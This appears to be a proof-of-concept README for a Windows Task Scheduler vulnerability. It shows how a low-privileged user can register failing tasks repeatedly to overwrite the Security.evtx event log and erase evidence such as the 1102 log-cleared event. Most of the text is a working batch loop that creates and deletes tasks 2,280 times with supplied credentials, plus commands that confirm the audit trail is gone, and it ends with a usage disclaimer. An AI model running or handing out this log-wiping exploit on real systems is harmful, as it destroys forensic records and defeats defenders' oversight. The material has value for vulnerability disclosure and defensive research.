By Ruben Enkaoua and Cymulate
Original Blog: Task Scheduler New Vulnerabilities
An attacker can register a task with a 5KB XML file - See TaskScheduler-Logs-Tampering, with a low privileged user and a password, which will not run. But the log is still registered, with a 3500 bytes buffer. It is possible to overwrite the whole Security.evtx database, since it is configured to contain maximum 20MB of logs by default.
The vulnerability can also be triggered remotely by patching the author entry in the XML file sent over RPC in impacket-atexec
- An unprivileged user to run the task
- A working password for the XML task to be registered, event if an error is generated
- The Security Policy "Audit Other Object Access Events" is enabled
Run the script
# Clear the logs to test if the only log "Clear Log" EVENT ID 1102 is overwritten.
# Check if the 1102 has been generated in the Security.evtx database
wevutil qe Security /q:"*[System[EventID=1102]]" /f:text
@echo off
for /l %%i in (1,1, 2280) do (
schtasks /create /tn poc /xml poc.xml /ru <user> /rp <password> >nul 2>&1 & schtasks /delete /tn poc /f >nul 2>&1
)
echo OKCheck the logs
# Check if the 1102 log still remains in the Security.evtx database
wevutil qe Security /q:"*[System[EventID=1102]]" /f:text
# If the result is empty, the Security.evtx database has been overwritten. This code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.